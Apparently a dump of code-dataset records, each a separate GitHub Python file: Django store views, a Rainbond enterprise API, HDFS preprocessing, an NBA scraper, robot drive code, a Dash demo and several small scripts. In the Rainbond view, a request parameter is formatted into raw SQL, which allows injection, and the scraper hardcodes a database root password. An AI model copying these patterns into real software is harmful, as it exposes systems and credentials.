= lambda a ,b : a + b\nsub = lambda a, b : a - b\nmul = lambda a, b : a * b\ndiv = lambda a, b : a / b\nmod = lambda a, b : a % b\nsquare = lambda a : a * a\ncube = lambda a : a * a * a\n\nresult_add = add(val1, val2)\nprint(result_add)\nresult_sub = sub(val1, val2)\nprint(result_sub)\nresult_mul = mul(val1, val2)\nprint(result_mul)\nresult_div = div(val1, val2)\nprint(result_div)\nresult_mod = mod(val1, val2)\nprint(result_mod)\nresult_square = square(val1)\nprint(result_square)\nresult_cube = cube(val1)\nprint(result_cube)","repo_name":"DharmilShahJBSPL/DharmilShah","sub_path":"python/lamda_anonymous_function/lambda_anonymous_function.py","file_name":"lambda_anonymous_function.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40581168794","text":"import requests\nfrom .models import UserProfile \n\ndef get_weather_data(location_name, user, forecast_type='current'):\n try:\n user_profile = UserProfile.objects.get(user=user)\n api_key = user_profile.accuweather_api_key\n\n\n params = {\n 'q': location_name,\n 'apikey': api_key,\n }\n\n location_search_endpoint = 'http://dataservice.accuweather.com/locations/v1/cities/search'\n response = requests.get(location_search_endpoint, params=params)\n location_data = response.json()\n \n if location_data:\n location_key = location_data[0]['Key']\n\n if forecast_type == 'current':\n forecast_endpoint = f'http://dataservice.accuweather.com/currentconditions/v1/{location_key}'\n elif forecast_type == 'daily':\n forecast_endpoint = f'http://dataservice.accuweather.com/forecasts/v1/daily/1day/{location_key}'\n else:\n return None\n\n forecast_response = requests.get(forecast_endpoint, params=params)\n forecast_data = forecast_response.json()\n return forecast_data\n else:\n return None\n except UserProfile.DoesNotExist:\n return None\n","repo_name":"mohan-cyber/weather-application","sub_path":"weatherapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40598952471","text":"from nis import cat\nfrom threading import get_ident\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom django.contrib import messages\nfrom .models import Product,ReviewRating\nfrom .forms import RatingsForm\nfrom Orders.models import OrderProduct\nfrom Category.models import Category\nfrom Cart.models import CartItem\nfrom Cart.views import _get_session_id\nfrom django.core.paginator import PageNotAnInteger,EmptyPage,Paginator\nfrom django.db.models import Q\n\n\n# Create your views here.\ndef store(request,category_slug=None):\n if category_slug:\n categories=get_object_or_404(Category,slug=category_slug)\n products=Product.objects.all().filter(category=categories,is_available=True).order_by('id')\n paginator=Paginator(products,1)\n page_num=request.GET.get('page')\n paged_products=paginator.get_page(page_num)\n else:\n products=Product.objects.all().filter(is_available=True).order_by('id')\n paginator=Paginator(products,6)\n page_num=request.GET.get('page')\n paged_products=paginator.get_page(page_num)\n context={\n 'page_num':page_num,\n 'page':paged_products,\n 'products_count':products.count()\n }\n return render(request,'store/store.html',context)\n\ndef product_detail(request,category_slug=None,product_slug=None):\n try:\n product=Product.objects.get(category__slug=category_slug,slug=product_slug)\n in_cart=CartItem.objects.filter(cart__cart_id=_get_session_id(request),product=product).exists()\n except Exception as e:\n return e\n try:\n bought_product=OrderProduct.objects.filter(user_id=request.user.id,product_id=product.id).exists()\n except OrderProduct.DoesNotExist:\n bought_product=None\n try:\n product_reviews=ReviewRating.objects.filter(product_id=product.id,status=True)\n except ReviewRating.DoesNotExist:\n product_reviews=None\n context={\n 'product':product,\n 'in_cart':in_cart,\n 'has_bought_product':bought_product,\n 'product_reviews':product_reviews\n }\n return render(request,'store/product_detail.html',context)\n\ndef search(request):\n if 'keyword' in request.GET:\n keyword=request.GET['keyword']\n if keyword:\n products=Product.objects.order_by('created_date').filter(Q(description__icontains=keyword) | Q(product_name__icontains=keyword))\n paginator=Paginator(products,8)\n page_num=request.GET.get('page')\n paged_products=paginator.get_page(page_num)\n else:\n return redirect('store')\n context={\n 'page_num':page_num,\n 'page':paged_products,\n 'products_count':products.count(),\n 'search_keyword':keyword\n }\n return render(request,'store/store.html',context)\n\ndef reviews(request,product_id):\n url=request.META.get('HTTP_REFERER')\n if request.method=='POST':\n try:\n reviews_=ReviewRating.objects.get(user_id=request.user.id,product_id=product_id)\n form=RatingsForm(request.POST,instance=reviews_)\n form.save()\n messages.success(request,'Thank you. Your review has been updated successfully!')\n return redirect(url)\n except ReviewRating.DoesNotExist:\n form=RatingsForm(request.POST)\n if form.is_valid():\n rating=ReviewRating()\n rating.user_id=request.user.id\n rating.product_id=product_id\n rating.subject=form.cleaned_data['subject']\n rating.review=form.cleaned_data['review']\n rating.rating=form.cleaned_data['rating']\n rating.ip=request.META.get('REMOTE_ADDR')\n rating.save()\n messages.success(request,'Thank you! Your review has been received. If you have any concerns please contact our support center')\n return redirect(url)\n return redirect(url)","repo_name":"GAndanje/EcommerceStore","sub_path":"Store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41311278097","text":"# -*- coding: utf-8 -*-\n# creater by: barnett\nimport logging\n\nfrom django.db import connection\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom rest_framework import status\nfrom rest_framework.response import Response\n\nfrom console.exception.main import ServiceHandleException\nfrom console.models.main import EnterpriseUserPerm\nfrom console.repositories.user_repo import user_repo\nfrom console.services.enterprise_services import enterprise_services\nfrom console.services.region_services import region_services\nfrom console.utils.timeutil import time_to_str\nfrom openapi.serializer.ent_serializers import EnterpriseInfoSerializer\nfrom openapi.v2.serializer.ent_serializers import (EnterpriseSourceSerializer, ListEntsRespSerializer, UpdEntReqSerializer)\nfrom openapi.v2.views.base import BaseOpenAPIView, ListAPIView\nfrom www.apiclient.regionapi import RegionInvokeApi\n\nlogger = logging.getLogger(\"default\")\nregion_api = RegionInvokeApi()\n\n\nclass ListEnterpriseInfoView(ListAPIView):\n @swagger_auto_schema(\n operation_description=\"获取企业列表\",\n manual_parameters=[\n openapi.Parameter(\"query\", openapi.IN_QUERY, description=\"按企业名称, 企业别名搜索\", type=openapi.TYPE_STRING),\n openapi.Parameter(\"current\", openapi.IN_QUERY, description=\"页码\", type=openapi.TYPE_STRING),\n openapi.Parameter(\"pageSize\", openapi.IN_QUERY, description=\"每页数量\", type=openapi.TYPE_STRING),\n ],\n responses={status.HTTP_200_OK: ListEntsRespSerializer()},\n tags=['openapi-entreprise'],\n )\n def get(self, req):\n try:\n page = int(req.GET.get(\"current\", 1))\n except ValueError:\n page = 1\n try:\n page_size = int(req.GET.get(\"pageSize\", 10))\n except ValueError:\n page_size = 10\n query = req.GET.get(\"query\", \"\")\n ents, total = enterprise_services.list_all(query, page, page_size)\n serializer = ListEntsRespSerializer({\"data\": ents, \"total\": total})\n return Response(serializer.data, status.HTTP_200_OK)\n\n\nclass EnterpriseInfoView(BaseOpenAPIView):\n @swagger_auto_schema(\n operation_description=\"更新企业信息\",\n query_serializer=UpdEntReqSerializer,\n responses={},\n tags=['openapi-entreprise'],\n )\n def put(self, req, eid):\n enterprise_services.update(eid, req.data)\n return Response(None, status=status.HTTP_200_OK)\n\n @swagger_auto_schema(\n operation_description=\"获取企业信息\",\n responses={200: EnterpriseInfoSerializer},\n tags=['openapi-entreprise'],\n )\n def get(self, req, eid):\n ent = enterprise_services.get_enterprise_by_id(eid)\n if ent is None:\n return Response({\"msg\": \"企业不存在\"}, status=status.HTTP_404_NOT_FOUND)\n serializer = EnterpriseInfoSerializer(data=ent.to_dict())\n serializer.is_valid(raise_exception=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass EnterpriseSourceView(ListAPIView):\n @swagger_auto_schema(\n operation_description=\"获取企业使用资源信息\",\n responses={200: EnterpriseSourceSerializer},\n tags=['openapi-entreprise'],\n )\n def get(self, req, eid):\n data = {\"enterprise_id\": eid, \"used_cpu\": 0, \"used_memory\": 0, \"used_disk\": 0}\n if not req.user.is_administrator:\n raise ServiceHandleException(status_code=401, error_code=401, msg=\"Permission denied\")\n ent = enterprise_services.get_enterprise_by_id(eid)\n if ent is None:\n return Response({\"msg\": \"企业不存在\"}, status=status.HTTP_404_NOT_FOUND)\n regions = region_services.get_regions_by_enterprise_id(eid)\n for region in regions:\n try:\n # Exclude development clusters\n if \"development\" in region.region_type:\n logger.debug(\"{0} region type is development in enterprise {1}\".format(region.region_name, eid))\n continue\n res, body = region_api.get_region_resources(eid, region=region.region_name)\n rst = body.get(\"bean\")\n if res.get(\"status\") == 200 and rst:\n data[\"used_cpu\"] += rst.get(\"req_cpu\", 0)\n data[\"used_memory\"] += rst.get(\"req_mem\", 0)\n data[\"used_disk\"] += rst.get(\"req_disk\", 0)\n except ServiceHandleException:\n continue\n\n serializer = EnterpriseSourceSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass EntUserInfoView(BaseOpenAPIView):\n def get(self, request, *args, **kwargs):\n page = int(request.GET.get(\"page_num\", 1))\n page_size = int(request.GET.get(\"page_size\", 10))\n enterprise_id = request.GET.get(\"eid\", None)\n\n admins_num = EnterpriseUserPerm.objects.filter(enterprise_id=enterprise_id).count()\n admin_list = []\n start = (page - 1) * 10\n remaining_num = admins_num - (page - 1) * 10\n end = 10\n if remaining_num < page_size:\n end = remaining_num\n\n cursor = connection.cursor()\n cursor.execute(\n \"select user_id from enterprise_user_perm where enterprise_id='{0}' order by user_id desc LIMIT {1},{2};\".format(\n enterprise_id, start, end))\n admin_tuples = cursor.fetchall()\n for admin in admin_tuples:\n user = user_repo.get_by_user_id(user_id=admin[0])\n bean = dict()\n if user:\n bean[\"nick_name\"] = user.nick_name\n bean[\"phone\"] = user.phone\n bean[\"email\"] = user.email\n bean[\"create_time\"] = time_to_str(user.create_time, \"%Y-%m-%d %H:%M:%S\")\n bean[\"user_id\"] = user.user_id\n admin_list.append(bean)\n\n result = {\"list\": admin_list, \"total\": admins_num}\n return Response(result, status.HTTP_200_OK)\n","repo_name":"goodrain/rainbond-console","sub_path":"openapi/v2/views/enterprise_view.py","file_name":"enterprise_view.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"45"} +{"seq_id":"73006552135","text":"import os\nimport pandas as pd\nimport shutil\nimport datetime\nfrom pywebhdfs.webhdfs import PyWebHdfsClient\nfrom hdfs import InsecureClient\n\ncurrent = datetime.datetime.now()\n\nclient_hdfs = InsecureClient('http://namenode:9870')\npath = 'mimic-iii-waveform'\nhdfs = PyWebHdfsClient(host='namenode',port='9870')\ndata = hdfs.list_dir('user/root/' + path)\n\nfile_statuses = data[\"FileStatuses\"]\n\nfor item in file_statuses[\"FileStatus\"]:\n\tsubdata = hdfs.list_dir('user/root/' + path + '/' + str(item['pathSuffix']))\n\tfile_statuses2 = subdata[\"FileStatuses\"]\n\tfor item2 in file_statuses2[\"FileStatus\"]:\n\t\tfile = str(item2['pathSuffix'])\n\t\tpath_file = path + '/' + str(item['pathSuffix']) + '/' + file\n\t\tif file.endswith('hea.txt'):\n\t\t\twith client_hdfs.read(path_file, encoding = 'utf-8') as reader:\n\t\t\t\tdf = pd.read_csv(reader, sep = ';')\n\t\t\t\t#Per i file segnale bisogna unire la riga delle unita misura alla riga di intestazione\n\t\t\t\tmeasure_units = df.iloc[[0]].to_records(index = False) #unit di misura\n\t\t\t\tdf = df.replace('\"', '')\n\t\t\t\tdf = df.drop(labels = 0, axis = 0) #elimino riga delle unità di misura dal file\n\t\t\t\t#aggiorno l'header del file csv aggiungengo le unità di misura\n\t\t\t\tfor i in range(len(df.columns)):\n\t\t\t\t\tmeasure_units[0][i] = measure_units[0][i].replace(\"(\", \"[\")\n\t\t\t\t\tmeasure_units[0][i] = measure_units[0][i].replace(\")\", \"]\")\n\t\t\t\t\tdf.rename(columns={ df.columns[i]: df.columns[i] + measure_units[0][i]}, inplace = True)\n\t\t\t\tpatientID = file[1:7]\n\t\t\t\ttime = file[19:24] + '-00'\n\t\t\t\tdate = file[8:18]\n\t\t\t\t#combine date and time to create a TimeStamp\n\t\t\t\ttimeH = datetime.datetime.strptime(time, '%H-%M-%S').time()\n\t\t\t\tdateH = datetime.datetime.strptime(date, '%Y-%m-%d')\n\t\t\t\ttimestamp = dateH.combine(dateH, timeH)\n\t\t\t\t#Convertion Elapsed Time in H:m:s format\n\t\t\t\tdf[df.columns[0]] = pd.to_numeric(df[df.columns[0]])\n\t\t\t\tdf[df.columns[0]] = df[df.columns[0]].apply(lambda x: datetime.timedelta(seconds = x))\n\t\t\t\t#Elaborate TimeStamp for each sample of the signal\n\t\t\t\tdf[df.columns[0]] = df[df.columns[0]].apply(lambda x: x + timestamp)\n\t\t\t\tdf.rename(columns = {df.columns[0]:'TimeStamp'}, inplace = True)\n\t\t\t\t#insert patientID in Signal file\n\t\t\t\tdf.insert(0, \"SUBJECT_ID\", patientID, True)\n\t\t\t\twith client_hdfs.write('processed/' + file[0:7] + \"/\" + file[:-8] + '.csv', encoding = 'utf-8') as writer:\n\t\t\t\t\tdf.to_csv(writer, sep = ';', index = None, header = True)\n\nprint('Total process time: ', datetime.datetime.now() - current)\n","repo_name":"MancoCarlo/healer-prototype","sub_path":"code/batchProcessing.py","file_name":"batchProcessing.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11309371847","text":"import MySQLdb\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nimport time\r\nfrom datetime import date, timedelta\r\n\r\n\r\ndef makeURL(bettingkind,bettingdate):\r\n #betting for two kinds of bets\r\n if bettingkind== 'spreads':\r\n bettingtypeinURL=\"\"\r\n elif bettingkind=='totals':\r\n bettingtypeinURL='totals/'\r\n url = 'http://www.sportsbookreview.com/betting-odds/nba-basketball/'+bettingtypeinURL+\"?date=\"+bettingdate\r\n return url\r\n\r\ndef getTeams(soup):\r\n firstlevels = soup.find_all('div', class_='el-div eventLine-team')\r\n\r\n\r\n teams = []\r\n previewURLS=[]\r\n #all this includes the same kind of scraping, with different levels\r\n\r\n\r\n for firstlevel in firstlevels:\r\n #arbritary names\r\n secondlevels= firstlevel.find_all('div',class_='eventLine-value')\r\n for secondlevel in secondlevels:\r\n thirdlevels= secondlevel.find_all('span',class_='team-name')\r\n for thirdlevel in thirdlevels:\r\n for element in thirdlevel:\r\n previewURLS.append(element['href'])\r\n for secondelement in element:\r\n teams.append(secondelement)\r\n return teams\r\n\r\ndef getPoints(soup):\r\n points=[]\r\n firstlevels = soup.find_all('div', class_='scorebox')\r\n for firstlevel in firstlevels:\r\n secondlevels= firstlevel.find_all('div',class_='score-periods')\r\n for secondlevel in secondlevels:\r\n thirdlevels=secondlevel.find_all('span',class_='current-score')\r\n for element in thirdlevels:\r\n element=str(element)\r\n element=element[:-7]\r\n element=element[49:]\r\n points.append(element)\r\n return points\r\n\r\n\r\n\"\"\"def teamswithPoints():\r\n x=getTeams()\r\n y=getPoints()\r\n newlist=[]\r\n for i in range(len(x)):\r\n newlist.append((x[i],y[i]))\r\n return newlist\"\"\"\r\n\r\ndef main():\r\n #connection to database\r\n db=MySQLdb.connect(\"localhost\",\"root\",\"vayum12\",\"finalyoubetchadb\")\r\n cursor=db.cursor()\r\n z=db.cursor()\r\n yesterday = date.today() - timedelta(1)\r\n #uses helper function to make the URL of the site we need to scrape\r\n x=makeURL(\"spreads\",str(yesterday.strftime('%Y%m%d')))\r\n r = requests.get(x)\r\n soup = BeautifulSoup(r.text,\"html.parser\")\r\n allgames = soup.find_all('div', class_='event-holder holder-complete')\r\n for game in allgames:\r\n team=getTeams(game)\r\n points=(getPoints(game))\r\n #needs a querry to put into my SQL to map this to the games program\r\n querry='Select id from game where date = \"'+str(yesterday) + '\" and Home_team = \"'+team[1] + '\" and Away_team = \"'+ team[0]+'\"'\r\n cursor.execute(querry)\r\n gameID= cursor.fetchone()\r\n z.execute(\"\"\"INSERT into results(Home_team,Away_team,Home_points,Away_points,game_id) values(%s,%s,%s,%s,%s)\"\"\",(team[1],team[0],points[1],points[0],gameID[0]))\r\n db.commit()\r\n db.close() \r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n","repo_name":"vayuma/YouBetcha","sub_path":"game results.py","file_name":"game results.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"16911748686","text":"import os\nimport pandas as pd\nimport numpy as np\nimport csv\n\nrootLocation = \"/home/rijesh/Documents/machine-learning/project/data\"\ntargetLocation = \"/home/rijesh/Documents/machine-learning/project/ust-machine-learning-project/merged_data_09_to_18.csv\"\n\ndef getFilesInFolder():\n fileNames = []\n for x in os.listdir(rootLocation):\n fileLoc = os.path.join(rootLocation, x)\n if os.path.isfile(fileLoc):\n fileNames.append(fileLoc)\n fileNames.sort(key=lambda s: int(s[6+ s.find(\"season\"):-4]))\n return fileNames\n\n\ndef iterate():\n fileNames = getFilesInFolder()\n for curfile in fileNames:\n print(\"Starting file cat: \", curfile)\n f = pd.read_csv(curfile)\n for index ,row in f.iterrows():\n if index % 1000 == 0:\n print(\"completed 1000 rows\")\n writeToCsv(row)\n\n\ndef writeToCsv(row):\n with open(targetLocation, \"a+\") as f:\n writer = csv.writer(f, delimiter=',')\n writer.writerow(row)\n\n\niterate()\n\n\n","repo_name":"lbutlr093/ust-machine-learning-project","sub_path":"filemerge.py","file_name":"filemerge.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"11555826872","text":"from ctre import FeedbackDevice, ControlMode, NeutralMode\nimport ctre\nfrom robotpy_ext.common_drivers.navx.ahrs import AHRS\nimport wpilib\nfrom wpilib.command.subsystem import Subsystem\nfrom wpilib.robotbase import RobotBase\nfrom wpilib.smartdashboard import SmartDashboard\n\nfrom common import robotMap\n\n\nclass DriveBase(Subsystem):\n \n def __init__(self):\n super().__init__()\n # Initialize and calibrate the NavX-MXP.\n self.gyro = AHRS.create_spi(wpilib.SPI.Port.kMXP)\n self.gyro.reset()\n \n # Initialize motors.\n self.l1 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.left1)\n self.l2 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.left2)\n self.r1 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.right1)\n self.r2 = ctre.wpi_talonsrx.WPI_TalonSRX(robotMap.right2)\n \n # Select a sensor for PID.\n self.l1.configSelectedFeedbackSensor(FeedbackDevice.CTRE_MagEncoder_Relative, 0, robotMap.ctreTimeout)\n self.r1.configSelectedFeedbackSensor(FeedbackDevice.CTRE_MagEncoder_Relative, 0, robotMap.ctreTimeout) \n \n # Left sensor runs in reverse so the phase must be set for PID.\n self.l1.setSensorPhase(True)\n self.r1.setSensorPhase(True)\n \n # Invert motor output as necessary.\n self.r1.setInverted(True)\n self.r2.setInverted(True)\n \n # Set secondary motors to follow primary motor speed.\n self.l2.follow(self.l1)\n self.r2.follow(self.r1)\n \n # Set talons to brake automatically.\n self.l1.setNeutralMode(NeutralMode.Brake)\n self.l2.setNeutralMode(NeutralMode.Brake)\n self.r1.setNeutralMode(NeutralMode.Brake)\n self.r2.setNeutralMode(NeutralMode.Brake)\n \n # If code is running on a RoboRio, configure current limiting.\n if RobotBase.isReal():\n self.l1.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.l1.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.l1.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.l1.enableCurrentLimit(True)\n \n self.l2.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.l2.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.l2.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.l2.enableCurrentLimit(True)\n \n self.r1.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.r1.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.r1.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.r1.enableCurrentLimit(True)\n \n self.r2.configPeakCurrentLimit(robotMap.peakCurrent, robotMap.ctreTimeout)\n self.r2.configPeakCurrentDuration(robotMap.peakTime, robotMap.ctreTimeout)\n self.r2.configContinuousCurrentLimit(robotMap.continuousCurrent, robotMap.ctreTimeout)\n self.r2.enableCurrentLimit(True)\n \n # Reset max recorded velocities\n self.maxRecordedLeftVelocity = 0\n self.maxRecordedRightVelocity = 0\n \n self.r1.configNeutralDeadband(0.1, 10)\n self.r2.configNeutralDeadband(0.1, 10)\n self.l1.configNeutralDeadband(0.1, 10)\n self.l2.configNeutralDeadband(0.1, 10)\n \n def diagnosticsToSmartDash(self):\n # Add position, velocity, and angle values to the SmartDash.\n \n SmartDashboard.putNumber(\"Left Encoder\", self.getLeftPosition() / robotMap.countsPerRevolution)\n SmartDashboard.putNumber(\"Right Encoder\", self.getRightPosition() / robotMap.countsPerRevolution)\n# SmartDashboard.putNumber(\"Left Velocity\", self.getLeftVelocity())\n# SmartDashboard.putNumber(\"Right Velocity\", self.getRightVelocity())\n \n if RobotBase.isReal():\n SmartDashboard.putNumber(\"Left Speed\", self.l1.getMotorOutputPercent())\n SmartDashboard.putNumber(\"Right Speed\", self.r1.getMotorOutputPercent())\n \n SmartDashboard.putNumber(\"Gyro Angle\", self.gyro.getAngle())\n SmartDashboard.putNumber(\"Barometric Pressure\", self.gyro.getBarometricPressure())\n\n def drive(self, leftSpeed, rightSpeed):\n # Set drive speed.\n self.l1.set(leftSpeed)\n self.r1.set(rightSpeed)\n \n def disable(self):\n self.l1.disable()\n self.r1.disable()\n \n def getGyroAngle(self):\n return self.gyro.getAngle()\n \n def resetGyroAngle(self):\n self.gyro.reset()\n \n def getLeftPosition(self):\n return -self.l1.getSensorCollection().getQuadraturePosition() \n \n def getRightPosition(self):\n return self.r1.getSensorCollection().getQuadraturePosition()\n \n def resetEncoderPosition(self):\n self.l1.getSensorCollection().setQuadraturePosition(0, robotMap.ctreTimeout)\n self.r1.getSensorCollection().setQuadraturePosition(0, robotMap.ctreTimeout)\n \n def getRightVelocity(self):\n return self.r1.getSensorCollection().getQuadratureVelocity()\n \n def getLeftVelocity(self):\n return -self.l1.getSensorCollection().getQuadratureVelocity()\n\n def positionPID(self, position):\n self.l1.set(ControlMode.Position, position)\n self.r1.set(ControlMode.Position, position)\n \n def getLeftError(self):\n return self.l1.getClosedLoopError(0)\n \n def getRightError(self):\n return self.r1.getClosedLoopError(0)\n\n\ndriveBase = DriveBase()\n","repo_name":"RVRProgramming/Diablo2018","sub_path":"subsystems/driveBase.py","file_name":"driveBase.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"30916249084","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport dash_table\nfrom dash.dependencies import Input, Output, State\n\n# loading external resources\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\noptions = dict(\n # external_stylesheets=external_stylesheets\n)\n\ndemo_app = dash.Dash(__name__, **options)\n\ndf_table = pd.read_csv(\"data/children-per-woman-UN.csv\")\ndf_table = df_table.dropna()\n\n\ndemo_app.layout = html.Div(\n children=[\n html.H1(children=\"Hello Dash\", id=\"title\"),\n html.Div(children=\"\"\"Hello World !\"\"\", id=\"paragraph\"),\n # dash_table.DataTable(\n # id='table',\n # columns=[{\"name\": i, \"id\": i} for i in df_table.columns],\n # data=df_table.to_dict('records'),\n # style_table={\n # 'maxHeight': '300px',\n # 'overflowY': 'scroll'\n # },\n # #filter_action=\"native\",\n # # sort_action=\"native\",\n # # fixed_rows={'headers': True, 'data': 0}\n # ),\n dcc.Dropdown(\n id=\"country-select\",\n multi=True,\n options=[\n {\"label\": country, \"value\": country_iso if country_iso else \"none\"}\n for country, country_iso in zip(\n df_table.country.unique(), df_table.country_iso.unique()\n )\n ],\n ),\n dcc.Graph(\n id=\"example-graph\",\n figure={\n \"data\": [\n {\"x\": [1, 2, 3], \"y\": [4, 1, 2], \"type\": \"bar\", \"name\": \"SF\"},\n {\n \"x\": [1, 2, 3],\n \"y\": [2, 4, 5],\n \"type\": \"bar\",\n \"name\": u\"Montréal\",\n },\n ],\n \"layout\": {\"title\": \"Dash Data Visualization\"},\n },\n ),\n ]\n)\n\n\n@demo_app.callback(\n [\n Output(component_id=\"paragraph\", component_property=\"children\"),\n Output(component_id=\"example-graph\", component_property=\"figure\"),\n ],\n [Input(component_id=\"country-select\", component_property=\"value\")],\n [State(component_id=\"example-graph\", component_property=\"figure\")],\n)\ndef update_figure(banana, cur_figure):\n\n if banana is not None:\n fig = {\n \"data\": [\n {\n \"x\": df_table[df_table.country_iso == iso].year,\n \"y\": df_table[df_table.country_iso == iso].fertility,\n \"type\": \"line\",\n \"name\": iso,\n }\n for iso in banana\n ],\n \"layout\": {\"title\": \"Dash Data Visualization\"},\n }\n else:\n banana = \"init\"\n fig = cur_figure\n\n return banana, fig\n\n\nif __name__ == \"__main__\":\n demo_app.run_server(debug=True)\n","repo_name":"rl-institut/workshop","sub_path":"plotly-dash/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"35603560695","text":"from __future__ import print_function\nimport datetime\nimport pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport requests\nimport pandas as pd\nimport csv\nfrom gcsa.google_calendar import GoogleCalendar\nfrom gcsa.event import Event\nfrom datetime import date, datetime\n\n\nSCOPES = ['https://www.googleapis.com/auth/calendar']\n\n\n\ndef main():\n\n \n \n #### GOOGLE CALENDAR AUTHENTIFICATION STUFF\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n print('Connecting with saved credentials')\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n print('Expired credentials, asking user to log in again')\n creds.refresh(Request())\n else:\n print('No credentials found, asking user to log in')\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n CAL = build('calendar', 'v3', credentials=creds)\n\n #Downloading the schedule from TimeEdit\n url = os.getenv('TIMEEDIT_URL')\n \n #Get the csv version of the schedule\n if url.find('.'):\n url = \"\".join([url.rsplit('.', 1)[0], '.csv'])\n #print(url)\n \n open('schedule.csv', 'wb').write(requests.get(url, allow_redirects=True).content)\n\n rows = []\n with open('schedule.csv') as f:\n reader = csv.reader(f, quotechar='\"')\n for row in reader:\n rows.append(row)\n #print(rows[5])\n\n calendar = GoogleCalendar(os.getenv('TIMEEDIT_MAIL'))\n \n x = 4\n while(len(rows) > x):\n dates = rows[x][0].split(\"-\")\n start_clock = rows[x][1].split(\" \")\n start_clock = start_clock[1].split(\":\")\n end_clock = rows[x][3].split(\" \")\n end_clock = end_clock[1].split(\":\")\n start = datetime(year=int(dates[0]), month=int(dates[1]), day=int(dates[2]), hour=int(start_clock[0]), minute=int(start_clock[1]))\n end = datetime(year=int(dates[0]), month=int(dates[1]), day=int(dates[2]), hour=int(end_clock[0]), minute=int(end_clock[1]))\n event = Event('{0} {1}'.format(rows[x][5], rows[x][4]),\n start=start,\n end=end)\n\n calendar.add_event(event)\n\n print('Attempting to add calendar event')\n x += 1\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"PerssonAlbin/cal-inject_OWN_PY","sub_path":"timeedit.py","file_name":"timeedit.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7253430050","text":"class Football:\n\n def __init__(self):\n self.teams = list([\"chelsea fc\", \"barcelona fc\", \"real madrid fc\", \"bayern munich fc\",\n \"paris saint germain fc\", \"ajax fc\", \"sevilla fc\", \"as monaco fc\"])\n self.winners = []\n self.final_team = []\n\n def team_list(self):\n print(f\"Welcome to Champions League here is the list of teams: \")\n print(f\"{self.teams}\".title())\n play_game = input(\"Please type 'start' to play the game or 'exit': \")\n if play_game == \"start\":\n team = [\"chelsea fc\", \"barcelona fc\", \"real madrid fc\", \"bayern munich fc\",\n \"paris saint germain fc\", \"ajax fc\", \"sevilla fc\", \"as monaco fc\"]\n print(\"Results of last 8 are as follows: \")\n print(\"\\n\")\n print(f\"{team[0]} vs {team[7]}\".title())\n print(f\"{team[1]} vs {team[6]}\".title())\n print(f\"{team[2]} vs {team[5]}\".title())\n print(f\"{team[3]} vs {team[4]}\".title())\n print(\"\\n\")\n score_team1 = int(input(f\"Please enter the score of {team[0]}: \"))\n score_team2 = int(input(f\"Enter the score of {team[7]}: \"))\n if score_team1 > score_team2:\n print(f\"{team[0]}..You are through to champions league, semi final stage..\".title())\n self.winners.append(team[0].title())\n else:\n print(f\"{team[7]}, You are through to champions league semi finals..\".title())\n self.winners.append(team[7].title())\n score_team3 = int(input(f\"Enter a score of {team[1]}: 